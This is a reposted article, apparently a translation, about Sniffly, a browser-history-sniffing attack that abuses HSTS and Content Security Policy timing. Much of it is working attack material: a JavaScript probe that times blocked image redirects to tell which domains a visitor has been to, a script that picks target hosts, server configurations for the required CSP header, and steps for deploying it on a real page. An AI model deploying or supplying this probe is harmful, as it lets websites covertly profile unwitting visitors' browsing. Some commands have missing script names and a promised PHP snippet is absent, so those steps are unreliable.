Sniffly: Uses HSTS and CSP to sniff browser history

Source: Internet
Author: User
Tags: HTTP Strict Transport Security, nginx, server




Sniffly is a timing attack that abuses HSTS (HTTP Strict Transport Security) together with Content Security Policy (CSP) to let any website sniff a visitor's browsing history. It was tested in Firefox and Chrome.


Try the demo in Firefox, Chrome or Opera, with the HTTPS Everywhere browser extension disabled first.

Demo address: Sniffly (open it only in Firefox, Chrome or Opera; it may crash other browsers).

Working Principle


To understand how Sniffly works, start by reading src/index.js in the source tree.

Here is how it works:

1. The user visits a web page with Sniffly embedded in it.
2. The page makes the browser try to load an image from each target domain over plain http.
3. Sniffly serves its page with a Content Security Policy that only allows http images, so the browser blocks the http-to-https redirect instead of following it. This is the critical step: if the browser were allowed to complete the https request, it would receive the target's HSTS header and pin the domain, and from then on the attack could no longer tell whether the user had really visited that domain before.
4. When CSP blocks an image, its onerror handler runs. The handler measures how long the image took to be redirected from http to https. A time on the order of a millisecond means the redirect came from the browser's own HSTS list with no network request, so the user has visited that domain before. A time on the order of 100 milliseconds means a real network request went out and the server answered with a redirect, so the user has not visited the domain.
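The probe described in the steps above, as an added example written for this page rather than code taken from Sniffly's src/index.js. It assumes the page carrying it is served with `Content-Security-Policy: img-src http:` (the header configured further down), measures the time from setting `img.src` to `onerror` with `performance.now()`, and classifies the result against a threshold. The 10 ms threshold, the host names and the simulated browser at the end are constructed for illustration; the simulation only exists so the logic can run under Node, where there is no `Image` and no network.

```javascript
// Sniffly-style HSTS timing probe (added example, not the project's own code).
// Requires the embedding page to be served with:  Content-Security-Policy: img-src http:
// so that any http->https redirect, whether it comes from the browser's HSTS list or
// from a network 301, is blocked by CSP and fires the image's onerror handler.

// Boundary between "HSTS rewrite, no network" (~1 ms) and "real request" (~100 ms).
// 10 ms is an assumption for illustration; tune it to the measured distribution.
const HSTS_THRESHOLD_MS = 10;

function classify(elapsedMs, threshold = HSTS_THRESHOLD_MS) {
  return elapsedMs < threshold ? 'visited' : 'not-visited';
}

// Probe one host. createImage and now are injectable so the same logic can run
// outside a browser; in a browser the defaults (new Image(), performance.now) apply.
function probeHost(host, { createImage, now, threshold } = {}) {
  const mkImage = createImage || (() => new Image());
  const clock = now || (() => performance.now());
  return new Promise((resolve, reject) => {
    const img = mkImage();
    let start = 0;
    img.onerror = () => {
      const elapsed = clock() - start;
      resolve({ host, elapsed, verdict: classify(elapsed, threshold) });
    };
    // A successful load means the CSP header is not in effect: the https request
    // completed, and the browser has now learned the host's HSTS pin for real.
    img.onload = () => reject(new Error(`${host}: image loaded; CSP img-src http: is not in effect`));
    start = clock();
    // Random path so a cached http->https redirect cannot masquerade as an HSTS hit.
    img.src = `http://${host}/${Math.random().toString(36).slice(2)}`;
  });
}

// Probe hosts one at a time so concurrent loads do not distort each other's timing.
async function sniffHistory(hosts, opts) {
  const results = [];
  for (const host of hosts) results.push(await probeHost(host, opts));
  return results;
}

// --- Offline simulation: a constructed stand-in for the browser, not a measurement ---
// Hosts in hstsHosts behave as if pinned (onerror after ~1 ms of simulated time);
// all others only fail after a simulated network round trip of rttMs.
function simulatedBrowser(hstsHosts, rttMs = 120) {
  let t = 0;
  const createImage = () => {
    const img = {};
    Object.defineProperty(img, 'src', {
      set(url) {
        const delay = hstsHosts.has(new URL(url).host) ? 1 : rttMs;
        setTimeout(() => { t += delay; img.onerror(); }, 0);
      },
    });
    return img;
  };
  return { createImage, now: () => t };
}

if (typeof window === 'undefined') {
  // Under Node: run against a constructed history (example.com and example.net "visited").
  const browser = simulatedBrowser(new Set(['example.com', 'example.net']));
  sniffHistory(['example.com', 'example.org', 'example.net'], browser)
    .then((rows) => console.table(rows));
}
```

In a real page you would drop the simulation, serve the file with the CSP header and call `sniffHistory(hostList)` with the hosts selected by the steps in the next section; the `onload` rejection is the check that tells you the header is missing before any pins get poisoned.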

Find the HSTS host address

Run the script over the site list to find out which hosts send an HSTS header:

$ cd util
$ ./  > results.log

The initial list contains 100 URLs; you can substitute a list that suits your environment, such as the Alexa top 1 million.

Process and sort the results by HSTS max-age, dropping hosts whose max-age is under one day (the pin expires too quickly to be useful) and hosts that are already on the browser's HSTS preload list (the browser treats those as HTTPS-only whether or not the user ever visited them, so they carry no signal):

$ cd util
$ ./  > processed.log

When it finishes, copy the host list from processed.log into src/index.js.
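The filtering that the processing step performs, as an added example written for this page (Sniffly's own util scripts are not reproduced here). It parses Strict-Transport-Security header values per RFC 6797, drops hosts whose max-age is under one day and hosts that are on the browser's preload list, and sorts the rest by max-age. The input format (host, a tab, then the header value), the sample lines and the preload set are constructed for the example; a real run would take the preload set from the browser's own list. A `preload` directive in the header only signals the site's intent, so it is parsed but not used for the decision.

```javascript
// Select usable HSTS hosts from a results log (added example, not Sniffly's util scripts).
const ONE_DAY_SECONDS = 86400;

// Parse a Strict-Transport-Security value (RFC 6797): ';'-separated directives,
// case-insensitive names, optional quoted values, max-age mandatory.
function parseHsts(value) {
  const out = { maxAge: null, includeSubDomains: false, preload: false };
  for (const part of value.split(';')) {
    const [rawName, ...rest] = part.split('=');
    const name = rawName.trim().toLowerCase();
    const val = rest.join('=').trim().replace(/^"(.*)"$/, '$1');
    if (name === 'max-age') {
      if (!/^\d+$/.test(val)) return null;           // malformed: browsers ignore the header
      out.maxAge = Number(val);
    } else if (name === 'includesubdomains') {
      out.includeSubDomains = true;
    } else if (name === 'preload') {
      out.preload = true;
    }
  }
  return out.maxAge === null ? null : out;
}

// lines: "host<TAB>header value", one host per line (constructed format).
// preloaded: Set of hosts built into the browser; they read as "visited" for everyone.
function usableHstsHosts(lines, preloaded, minAge = ONE_DAY_SECONDS) {
  const rows = [];
  for (const line of lines) {
    const tab = line.indexOf('\t');
    if (tab < 0) continue;
    const host = line.slice(0, tab).trim().toLowerCase();
    const hdr = parseHsts(line.slice(tab + 1));
    if (!hdr) continue;                   // no or invalid HSTS header: nothing to pin
    if (hdr.maxAge < minAge) continue;    // pin expires too soon to be reliable
    if (preloaded.has(host)) continue;    // preloaded: no visit needed, no signal
    rows.push({ host, maxAge: hdr.maxAge, includeSubDomains: hdr.includeSubDomains });
  }
  return rows.sort((a, b) => b.maxAge - a.maxAge);
}

// Constructed sample log, one host per line.
const SAMPLE_RESULTS = [
  'a.example\tmax-age=31536000; includeSubDomains',
  'b.example\tmax-age=3600',                                 // one hour: dropped
  'c.example\tmax-age=63072000; includeSubDomains; preload', // on preload list: dropped
  'd.example\tMax-Age="15552000"',                           // odd casing, quoted: still valid
  'e.example\tmax-age=abc',                                  // malformed: dropped
  'f.example\t',                                             // no header: dropped
];
const PRELOADED = new Set(['c.example']); // constructed stand-in for the browser's list

if (typeof require !== 'undefined' && require.main === module) {
  console.table(usableHstsHosts(SAMPLE_RESULTS, PRELOADED));
}
```

The surviving rows, in max-age order, are the hosts worth pasting into src/index.js; everything the browser would never pin, or would pin regardless of the user's history, has been removed.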



Open file:///path/to/sniffly/src/index.html in Chrome. Firefox apparently does not honour a CSP delivered in a <meta> tag, so for Firefox you need a local web server that sends the policy as an HTTP response header. My nginx server block looks like this:

    server {
        listen 8081;
        server_name localhost;
        location / {
            root /path/to/sniffly/src;
            add_header Content-Security-Policy "img-src http:";
            index index.html;
        }
    }

Or, with Apache, in a .htaccess file:

  Header set Content-Security-Policy "img-src http:"

Or send the header from PHP. Paste the following snippet at the top of the script (and rename index.html to index.php):



Notes

1. Safari, Internet Explorer and Chrome on iOS are not supported.
2. Disable HTTPS Everywhere; browser extensions that force HTTPS will skew the results.
3. Do not use Tor Browser: it rounds timers to roughly 100 ms, which erases the difference the attack depends on.
4. A browser whose built-in HSTS preload list differs from the one the host list was checked against (an older version, for instance) may give inaccurate results.
5. The policy depends on `img-src http:` rejecting https URLs. Later CSP revisions (Level 3) let a bare `http:` scheme source match https: as well; in a browser that implements this the upgraded request is no longer blocked, and the timing difference disappears.
